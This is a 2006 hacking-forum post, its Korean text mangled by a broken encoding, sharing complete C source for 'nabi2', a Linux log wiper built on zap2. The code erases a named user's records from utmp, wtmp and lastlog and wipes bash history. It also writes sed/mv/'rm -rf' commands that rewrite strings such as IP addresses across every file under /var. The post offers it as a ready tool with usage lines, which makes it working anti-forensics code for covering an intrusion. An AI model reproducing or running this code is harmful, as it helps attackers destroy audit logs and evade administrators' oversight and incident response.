1589, 10/80 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   x90c
   ¸®´ª½º ·Î±×Á¤¸® µµ±¸ - nabi2.c

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=497 [º¹»ç]


/*

     Advanced /var log wiper for linux

     nabi ver 2 ( friendly zap2.c )


    Release Date:
        nabi ver 2 - 3.8 2006 (Wed)
               nabi ver 1 - 1.15 2006 (Sun)
        
        1: zap2)
            # ./nabi -z root
        2: history cleanup)
            # ./nabi -h
        3: string change)
            # ./nabi -r 111.111.111.111 222.222.222.222 ( you must check these strings length is same)
            # ./nabi -r 'pts/1' 'tty/0' ( yo ~! )

                Tested on:
                        - Debian 3.0r1
                        - RH 9.0
                        - Fedora core 2
                        ..

                CHANGED:
                        - add program option parser for split features on this file.
                        - erased minor version number of this program.

                BUG FIXED:
                        - when if you typed "./nabi root 'pts/1' 'pts/2' then you may had an error
                          cause the not proper slashes of 's/pts/1/pts/2' but now it's okay.
                          see escape_slash().
                
        comment:
                i become a curious guy when i'm typing some code. what about you all?
                for more useful toolkit. brb!

                
*/


#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define MAX_PATH        1024
#define MAX_DEPTH       128

#define        PROGRAM                        "Nabi ver 2 ( geinblues@gmail.com )"


/*
#define DEBUG
*/

/* proto type */
int insert_node(char *filename);
void load_dir(int cdepth);
void init_list();
void show_list();
void exploit(char *string, char *newstring);
void history_cleanup();
void zap2_main(char *user);
void escape_slash(char *pstr);

/* linked-list stuffs for file list */
struct file_list
{
        struct file_list *next;
        int depth;
        char d_name[MAX_PATH];
} *head, *tail;

static char root_dir[] = "/var";

int main(int argc, char *argv[])
{
        struct dirent *dp;
        DIR *dir;
        int dumb;
        char opt;
        char usage[]={
            "\n%s\n Usage : %s \n\t-z [username] : zap2 lucky!\n"
            "\t-r <original string> <new string> : replace strings in all of files under /var\n"
            "\t-h : clear bash history\n\n"
        };

        if(argc == 1){
          printf(usage, PROGRAM, argv[0]);
                return(-1);
        }

        /* parsing the single option */
        opt = (char)argv[1][1];

        switch(opt){
                case 'z':
                            zap2_main(argv[2]);
                             return(0);
                  case 'h':
                             history_cleanup();
                        return(0);
                case 'r':
                        if(strlen(argv[2]) != strlen(argv[3])){
                             fprintf(stderr, "must to be two string length is same. \n");
                             return(-1);
                        }


                        /* initialization linked-list */
                           init_list();

                        /* prepare root_dir(/var) is be able to use */
                           if((dir = opendir(root_dir)) == NULL){
                                     fprintf(stderr, "can't open root directory");
                                     return(-2);
                           }

                           closedir(dir);


                        /* loading file list into initialized linked-list ( MAX_DEPTH = /var/a/b/c/d... x 128 ) */
                           for(dumb = 1; dumb < MAX_DEPTH; dumb++){
                                     load_dir(dumb);
                           }

                        #ifdef        DEBUG
                                show_list();
                        #endif

                        // spoof all your strings like ipaddress under /var directories.
                        exploit(argv[2], argv[3]);

                default:
                        fprintf(stderr, "check your arguments :)\n");
       }
        

return 0;

}

void init_list()
{
        head = (struct file_list *) malloc(sizeof(struct file_list));
        tail = (struct file_list *) malloc(sizeof(struct file_list));

        head->depth = 1;
        strncpy(head->d_name, root_dir, MAX_PATH);
        head->next = tail;

        tail->depth = -1;
        tail->next = NULL;
}

int insert_node(char *filename)
{
        struct file_list *ipos;
        struct file_list *new_node;
        unsigned int cnt_d = 0;
        char *ifilename;

        ifilename = filename;

        #ifdef  DEBUG
                printf("insert_node\n");
                printf("%s\n", ifilename);
        #endif

        while(*ifilename != '\x00')
                if(*ifilename++ == '/') cnt_d++;

        #ifdef  DEBUG
                printf("cnt_d = %d\n", cnt_d);
        #endif

        for(ipos = head; ipos->next != tail; ipos = ipos->next);
        //ipos = ipos->next;

        if((new_node = (struct file_list *)malloc(sizeof(struct file_list))) == NULL)
                return(-1);

        new_node->depth = cnt_d;
        strncpy(new_node->d_name, filename, MAX_PATH);
        new_node->next = tail;

        ipos->next = new_node;

        #ifdef  DEBUG
                printf("newnode file: %s\n", filename);
        #endif

return 0;
}

void load_dir(int cdepth)
{
        struct file_list *wpos;
        DIR *dir;
        struct dirent *dp;
        char full_path[MAX_PATH];
        int dplen = 0;

        #ifdef  DEBUG
                printf("load_dir\n");
        #endif

        for(wpos = head; wpos->next != NULL; wpos = wpos->next){

                if(wpos->depth == -1) return;

        #ifdef  DEBUG
                printf("wpos->depth : %d cdepth: %d\n", wpos->depth, cdepth);
        #endif
                if(wpos->depth == cdepth){

                        // insert cdepth's child directories.
                        if((dir = opendir(wpos->d_name)) == NULL){
                                continue;
                        }

                        while((dp = readdir(dir)) != NULL){
                                dplen = strlen(dp->d_name);
                                if(dp->d_name[dplen-1] != '.'){
                                        sprintf(full_path, "%s/%s", wpos->d_name, dp->d_name);
                                        insert_node(full_path);
                                }
                        }

                        closedir(dir);
                }
        }

        wpos = wpos->next;      // left last one node hmm ??
}

void show_list()
{
        struct file_list *spos;

        #ifdef  DEBUG
                printf("showlist\n");
        #endif

        for(spos = head; spos->next != NULL; spos = spos->next){
                printf("%d: %s\n", spos->depth, spos->d_name);
        }

}

void escape_slash(char *pstr)
{
        char orig[512];
        char *tmp;
        int pos = 0;

        tmp = pstr;

        memset(orig, 0, sizeof(orig));

        while(*tmp != '\x00'){
                if(*tmp != '/')
                        orig[pos++] = *tmp;
                else{
                        orig[pos++] = '\\';
                        orig[pos++] = '/';
                }

                tmp++;
        }

        pstr = orig;

        #ifdef        DEBUG
                printf("%s\n", pstr);
        #endif

}


/* thanks for this nice program sed and mv */
#define NICE_SED        "/bin/sed"
#define USEFUL_MV       "/bin/mv"

void exploit(char *string, char *newstring)
{
        struct file_list *epos;
        struct stat nabistat;
        char command[512];
        char tmp_file[128];

        if(strlen(string) != strlen(newstring)){
                perror("must to be two argument's length is same. \n");
                return;
        }

        for(epos = head; epos->next != NULL; epos = epos->next){
                lstat(epos->d_name, &nabistat);

                if(S_ISREG(nabistat.st_mode)){
                        
                        #ifdef  DEBUG
                                printf("THIS IS REGULAR FILE>> %s\n", epos->d_name);
                        #endif
                        
                        sprintf(tmp_file, "%s.sed", epos->d_name);

                        escape_slash(string);
                        escape_slash(newstring);

                        sprintf(command, "%s 's/%s/%s/g' %s > %s.sed; %s %s %s; rm -rf %s",
                                NICE_SED, string, newstring, epos->d_name, epos->d_name,
                                USEFUL_MV, tmp_file, epos->d_name,
                                tmp_file);

               //         system(command);
                        
                        #ifdef  DEBUG
                                printf("%s\n", command);
                        #endif
                }
        }


}


void history_cleanup()
{

        /* request new machnism for this function */
        system("w; last; lastlog; echo > ~/.bash_history");
        system("echo 'clear;history -c' > ~/.bash_logout");

}





/*

        zap2.c ( combined ).

*/


#define WTMP_NAME "/var/log/wtmp"
#define UTMP_NAME "/var/run/utmp"
#define LASTLOG_NAME "/var/log/lastlog"

int f;

void kill_utmp(who)
char *who;
{
        struct utmp utmp_ent;

                if ((f=open(UTMP_NAME,O_RDWR))>=0) {
                        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
                                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                                        bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                                        lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                                        write (f, &utmp_ent, sizeof (utmp_ent));
                                }
                        close(f);
                }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
        if ((f=open(WTMP_NAME,O_RDWR))>=0) {

                         while(pos != -1L) {
                                lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
                                        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                                                pos = -1L;
                                        } else {
                                        
                                        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                                                bzero((char *)&utmp_ent,sizeof(struct utmp ));
                                                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                                                write (f, &utmp_ent, sizeof (utmp_ent));
                                                pos = -1L;
                                        } else pos += 1L;
                                }
                        }
                close(f);
        }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

        if ((pwd=getpwnam(who))!=NULL) {

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

    } else printf("%s: ?\n",who);
}



void zap2_main(char *user)
{

        kill_lastlog(user);
        kill_wtmp(user);
        kill_utmp(user);

        printf("nabi: Zap2!\n");

}





  Hit : 11808     Date : 2006/03/07 11:40



    
pr0sp3r ¾Ç¿ëµÉ ¿ì·Á°¡ ÀÖ¾î perfect code ¸¦ ¿ÀÇÂÇÏ´Â°Ç ¹®Á¦°¡ ÀÖÀ»°Í °°½À´Ï´Ù. 2006/03/11  
x90c Äڵ带 ¾î¶»°Ô °ø°³Çϴ°ÍÀÌ ÁÁÀ»Áö¿¡ ´ëÇؼ­ °íÂûÁß¿¡ ÀÖ½À´Ï´Ù. ¿¹ ¾ÕÀ¸·Ð Á» »ý°¢Çغ¸°í ´õ ÁÁÀº ¹æÇâÀÌ ÀÖÀ¸¸é ±× ¹æÇâÀ¸·Î ¹Ù²ã°¡°Ú½À´Ï´Ù. :p 2006/03/13
rlejr92 ¾î·Æ´Ù... 2006/03/14  
ttongfly °³ÀÎ »çÀÌÆ®¿¡ °ø°³Çϼ¼¿ä~ 2006/03/28  
lhb094 ºñÁÖ¾ó¾¾·Î ÄÄÆÄÀÏ ÇÏ´Ñ±î ¾Ö·¯ Çϳª°¡ ÀâÈ÷´Âµ¥¿ä ¤Ñ¤Ñ 2006/04/03  
cksgus22 ¤»¤»¤» ¹«½¼¸»ÀÎÁö... 2006/04/15  
kim0237 ÇѾøÀÌ ¾î·Á¿öÁö´Â ¸®´ª½º ¤Ð.¤Ð ¸Ó¸®°¡ 100°³ ÀÌ»óÀÌ¸é ½±°Ô ÀÌÇØÇÒ¼öÀÖÀ»±î;; 2006/06/19  
1409   ³×À̹öÁö½ÄÀÎ [Æß]xp ¿ì¸®°¡¸ð¸£´Â°Íµé 3[2]     jbp1858
02/16 8930
1408   ³×À̹öÁö½ÄÀÎ [Æß]xp ¿ì¸®°¡¸ð¸£´Â°Íµé 4 [¸¶Áö¸·][9]     jbp1858
02/16 10877
1407   ¾Ë±â ¾î·Æ°Ô ¼³¸íÇÑ Buffer Overflow[4]     blackcoder
02/17 13521
1406   OpenVMS ¿î¿µÃ¼Á¦ÀÇ WASD À¥¼­¹ö ¿©·¯ Ãë¾à¼ºÀÇ ÀÌÇØ     x90c
02/18 10231
1405   ÀͽºÇ÷η¯ â ŸÀÌƲ¹Ù¿¡ ±Û¾¾ ³Ö±â~[4]     kgt2001sus
02/21 9007
1404   NT±â¹ÝÀ©µµ¿ì ·Î±×¿Â½Ã ºñ¹Ð¹øÈ£ ¹¯Áö ¾Ê±â![2]     kgt2001sus
02/21 8845
1403   OpenVMS Tutorial[4]     x90c
02/23 18814
1402   À©µµ¿ìÁî XP SP1 WFP (Windows File Protection) ²ô±â[1]     x90c
03/05 12361
  ¸®´ª½º ·Î±×Á¤¸® µµ±¸ - nabi2.c[7]     x90c
03/07 11807
1400   bof & fsb ¿¡ À¯¿ëÇÑ ÆÞ ½ºÅ©¸³Æ®[5]     awsedr45
03/11 12154
1399   c¾ð¾î¿ä..ÃâÀú´Â2004½ºÅ͵ðc/c++ÀÔ´Ï´Ù[7]     ¹é·æÃâÇØ
03/17 10443
1398   ¿Ø¸¸ÇÑ»ç¶÷µéÀº´Ù¾ËÁöµµ¸ð¸£°ÚÁö¸¸[6]     ¹é·æÃâÇØ
03/17 12761
1397   À¥ °Ô½ÃÆǵéÀÇ À¥½ÇÇàÆÄÀÏ ¾÷·Îµå Ãë¾àÁ¡(ÆÄÀϸí ÇÊÅ͸µ ¿ìȸ)[19]     dual5651
03/28 25626
1396   ÇÁ¶óÀ̹ö½Ã Á¤Ã¥ È°¿ëÇÑ¡¸µ¥ÀÌÅÍ ¼öÁý¡¹     nonamePIG
04/04 7874
1395   [ÄÄÇ»ÅÍ Â¯µÇ´Â 100°¡Áö ÆÁ] ³×À̹ö¿¡¼­ ÆÛ¿È!![2]     turtle0216
04/12 12363
1394   À¯¿ëÇÑ ÄÄÇ»ÅÍ ÆÁ4°¡Áö ³×À̹ö Áö½Ä...     turtle0216
04/12 9518
1393   [¿Õ¹æ]³×Æ®¿öÅ© ±âÃÊÀÌ·Ð(3-1)[3]     heart153
04/16 9021
1392   À¯´Ð½º ¸í·É¾î[1]     vvÈ«½ÃÁöÁ¸vv
04/19 10117
1391   cisco ios ¼ÒÇÁÆ®¿þ¾î cli [1] ÀÌ±Û ¿Ã·ÁµÎµÇ³ª...???     ij·²¸°
04/27 9675
1390   À¯´Ð½º Æнº¿öµå °æ·Î...     mkim2
05/18 7872
[1][2][3][4][5][6][7][8][9] 10 ..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org